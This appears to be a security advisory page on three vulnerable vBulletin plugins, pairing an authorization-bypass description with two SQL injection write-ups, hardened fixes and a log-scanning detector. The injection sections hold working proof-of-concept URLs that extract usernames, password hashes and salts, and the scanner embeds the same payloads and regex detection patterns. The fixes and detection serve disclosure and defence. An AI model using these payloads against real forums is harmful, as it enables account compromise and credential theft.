vBulletin SCANU’s vBFinder Plugin – Authorization Bypass

Plugin: http://www.vbulletin.org/forum/showthread.php?t=299490
Version: <= 0.2 (latest)

The flaw in this plugin is that the connector file performs no authorization check: it never verifies that the current user is logged in as an administrator. This can be exploited by creating an .html file whose URL references all point to the admincp of a forum running this plugin. Proof of concept:
(Proof-of-concept HTML omitted from this copy of the page; only its visible text "Loading…" remains.)

This establishes a connection to the vulnerable host and pops up the file manager.
You can then download, upload or delete anything you want and browse through all of the files.
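A connector that is only meant for administrators has to refuse every request that does not arrive with an authenticated admin session, and ideally also the per-session security token so that a page on another origin cannot drive it through a logged-in administrator's browser. The guard below is an added example, not vBFinder's own code. It assumes the connector lives in admincp/ so that ./global.php is vBulletin's admin bootstrap, and that can_administer(), print_cp_no_permission() and verify_security_token() are the stock core helpers with the behaviour described in the comments.

```php
<?php
// Added example guard for an admincp connector (not the plugin's code).
// Assumption: this file sits in admincp/, so './global.php' is the admin
// bootstrap, which itself forces an admin login before it returns.
require_once('./global.php');

// Assumption: can_administer() / print_cp_no_permission() are vBulletin's
// admin-permission helpers. Demand an explicit permission bit instead of
// relying on the bootstrap alone.
if (!can_administer('canadminsettings'))
{
    print_cp_no_permission();   // prints an error page and exits
}

// Read the submitted token the vBulletin way rather than from $_REQUEST.
$vbulletin->input->clean_array_gpc('r', array(
    'securitytoken' => TYPE_STR,
));

// Assumption: verify_security_token() checks a submitted token against the
// current user's raw token; 'securitytoken_raw' is the userinfo field it
// expects. Reject file operations that do not carry a valid token.
if (!verify_security_token($vbulletin->GPC['securitytoken'], $vbulletin->userinfo['securitytoken_raw']))
{
    print_cp_no_permission();
}

// Only past this point may the connector list, read, write or delete files.
```

Placing the check before any file handling means an unauthenticated caller, or a forged page that merely reuses the file manager's front end, is stopped at the connector itself rather than relying on the UI never being copied.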

vBulletin vBSocial.com Wall Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=294260
Version: <= 2.5 (latest)

The vulnerability resides in the misc_start hook and the /includes/class_statusbit.php file:

	public function process_fetch_status_item($status_id)
	{
		global $vbulletin;
		// $status_id is interpolated into the query without escaping: this is the injection point
		$status_item = $vbulletin->db->query_first("SELECT * FROM ".TABLE_PREFIX."status WHERE id='$status_id'");
		if ($status_item)
		{
			$status_item['message'] = htmlspecialchars_uni($status_item['message']);
			$status_item['message'] = smartConvertPost($status_item['message']); // parse image links
			$status_item['message'] = parse_youtubelinks($status_item['message']); // parse youtube video links
			$status_item['message'] = nl2br(trim(fetch_censored_text($status_item['message'])));

			if ($status_item['type'] == 'poll')
			{
				$poll_get = $vbulletin->db->query_read("SELECT * FROM ".TABLE_PREFIX."status_poll WHERE statusid='".$status_item['id']."'");
				if ($vbulletin->db->num_rows($poll_get) > 0)
				{
					$i = 0;
					while ($poll_item = $vbulletin->db->fetch_array($poll_get))
					{
						$i++;
						$status_item['message'] .= ''; // poll option markup was stripped from this copy of the page
					}
				}
			}
			return $status_item['message'];
		}
	}

User-supplied data ($status_id) is passed straight into the SQL query without being sanitized or validated.

Proof of concept:
http://example.com/misc.php?do=ln_fetch_status_item&status_id=11' UNION SELECT null, concat(username, 0x3a, password, 0x3a, salt), null, null, null, null, null, null, null, null, null, null, null FROM user WHERE userid = '1

This will display the username, password and salt of the user with id 1 in the database.
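The id is a numeric primary key, so the simplest fix is to refuse anything that is not a positive integer before it reaches SQL, and to escape the value that is re-interpolated into the poll query. The class below is an added, hardened version written for this page; it is not the plugin's code. The class name vB_StatusBit_Hardened and the poll column option_text are assumptions, and the $vbulletin->db wrapper (query_first, query_read, escape_string, fetch_array) is assumed to be the stock vBulletin one.

```php
<?php
// Added example: hardened version of process_fetch_status_item() (not the plugin's code).
class vB_StatusBit_Hardened   // hypothetical class name
{
    public function process_fetch_status_item($status_id)
    {
        global $vbulletin;

        // The status id is numeric, so reject anything else before it
        // reaches SQL: intval("11' UNION SELECT ...") is just 11.
        $status_id = intval($status_id);
        if ($status_id <= 0)
        {
            return '';
        }

        $status_item = $vbulletin->db->query_first(
            "SELECT * FROM " . TABLE_PREFIX . "status WHERE id = " . $status_id
        );
        if (!$status_item)
        {
            return '';
        }

        $message = htmlspecialchars_uni($status_item['message']);
        $message = smartConvertPost($message);   // parse image links
        $message = parse_youtubelinks($message); // parse youtube video links
        $message = nl2br(trim(fetch_censored_text($message)));

        if ($status_item['type'] == 'poll')
        {
            // A value read back from the database is not automatically safe
            // to re-interpolate; escape it like any other string.
            $poll_get = $vbulletin->db->query_read(
                "SELECT * FROM " . TABLE_PREFIX . "status_poll WHERE statusid = '"
                . $vbulletin->db->escape_string($status_item['id']) . "'"
            );
            while ($poll_item = $vbulletin->db->fetch_array($poll_get))
            {
                // Output-encode each poll option before appending it to the HTML.
                $message .= '<br />' . htmlspecialchars_uni($poll_item['option_text']); // column name assumed
            }
        }
        return $message;
    }
}
```

Casting with intval() is appropriate only because the column is an integer; for a string column the equivalent would be $vbulletin->db->escape_string() on the value, as done for the poll subquery.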

[Image: vBSocial Wall SQL Injection]

vBulletin MicroSUPPORT Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=254336
Version: <= 4.6.4 (latest)

The vulnerability resides in the microsupport.php file. No variable is sanitized before being used directly in SQL queries, anywhere in the file. An easy way to extract information from the database is to abuse the checkchatcall_request branch of the script, which looks like this:

if ($_REQUEST['requester'] == "checkchatcall_request") {
	// TYPE_STR only cleans the string; it does not escape it for SQL,
	// so adminsID is interpolated into the query exactly as supplied.
	$adminsID = $vbulletin->input->clean_gpc('r', 'adminsID', TYPE_STR);
	$chatcheck = $db->query_read("SELECT * FROM ".TABLE_PREFIX."microsupport_supportusers_online WHERE supportuserid=$adminsID");

	while ($row = $db->fetch_array($chatcheck)) {
		if ($row['usersUID'] > 0) {
			$usersid = $row['usersUID'];
			$output = 'checkchatcall=1&supportuseridrequester='.$usersid;
		} else {
			$output = 'checkchatcall=0';
		}
	}
	echo $output;
}

Proof of concept:
http://example.com/microsupport.php?requester=checkchatcall_request&adminsID=1 UNION SELECT null, concat(1, 0x3a, username, 0x3a, password, 0x3a, salt), null, null, null FROM user where userid = 1

Note that the first field in the concat() must be numeric: the code checks whether usersUID, the first column of the result row, is greater than 0 before it echoes anything.
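Both SQL injections above are driven through a single numeric parameter (status_id on misc.php, adminsID on microsupport.php), which makes attempts easy to spot in web-server access logs: the parameter should only ever be digits. The scanner below is an added example for this page, not code from either plugin or from the advisory. It parses combined-format log lines, URL-decodes the query string and flags requests whose id parameter carries SQL syntax; the four log lines are constructed for the example, with the injected values modelled on the proofs of concept shown on this page.

```php
<?php
// Added example: flag injection attempts against the two vulnerable endpoints
// in access-log lines. Sample log lines below are constructed for this example.

const SUSPECT_PARAMS = array(
    'misc.php'         => 'status_id', // vBSocial Wall: do=ln_fetch_status_item
    'microsupport.php' => 'adminsID',  // MicroSUPPORT: requester=checkchatcall_request
);

function is_sql_like($value)
{
    // Both parameters are numeric ids; pure digits are fine. Anything else
    // containing UNION/SELECT, a quote or a comment marker is an indicator.
    if (preg_match('/^\d+$/', $value)) {
        return false;
    }
    return (bool) preg_match("/union|select|['\"#]|--|\/\*/i", $value);
}

function scan_access_log(array $lines)
{
    $hits = array();
    foreach ($lines as $line) {
        // Apache/nginx combined format: client - - [time] "METHOD target HTTP/x" status ...
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
            continue;
        }
        list(, $client, $time, $target) = $m;
        $script = basename((string) parse_url($target, PHP_URL_PATH));
        if (!isset(SUSPECT_PARAMS[$script])) {
            continue;
        }
        // parse_str() decodes %xx and '+' so encoded payloads are inspected in clear.
        parse_str((string) parse_url($target, PHP_URL_QUERY), $query);
        $param = SUSPECT_PARAMS[$script];
        if (isset($query[$param]) && is_sql_like($query[$param])) {
            $hits[] = array(
                'client' => $client,
                'time'   => $time,
                'script' => $script,
                'param'  => $param,
                'value'  => $query[$param],
            );
        }
    }
    return $hits;
}

// Constructed sample: a benign request and an injection attempt per endpoint.
$sample = array(
    '203.0.113.7 - - [10/Oct/2013:13:55:36 +0000] "GET /misc.php?do=ln_fetch_status_item&status_id=11 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2013:13:55:41 +0000] "GET /misc.php?do=ln_fetch_status_item&status_id=11%27%20UNION%20SELECT%20null,concat(username,0x3a,password,0x3a,salt)%20FROM%20user HTTP/1.1" 200 734',
    '198.51.100.9 - - [10/Oct/2013:14:02:03 +0000] "GET /microsupport.php?requester=checkchatcall_request&adminsID=1 HTTP/1.1" 200 17',
    '198.51.100.9 - - [10/Oct/2013:14:02:09 +0000] "GET /microsupport.php?requester=checkchatcall_request&adminsID=1%20UNION%20SELECT%20null,concat(1,0x3a,username,0x3a,password),null,null,null%20FROM%20user HTTP/1.1" 200 89',
);

foreach (scan_access_log($sample) as $hit) {
    printf("%s %s %s %s=%s\n", $hit['time'], $hit['client'], $hit['script'], $hit['param'], $hit['value']);
}
```

Run against the constructed sample this reports the second and fourth lines only. The digits-only check is the important part: it catches payloads that avoid the UNION/SELECT keywords, and because the scanner keys on the specific script and parameter it produces far fewer false positives than a site-wide keyword search.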

[Image: microSUPPORT SQL Injection]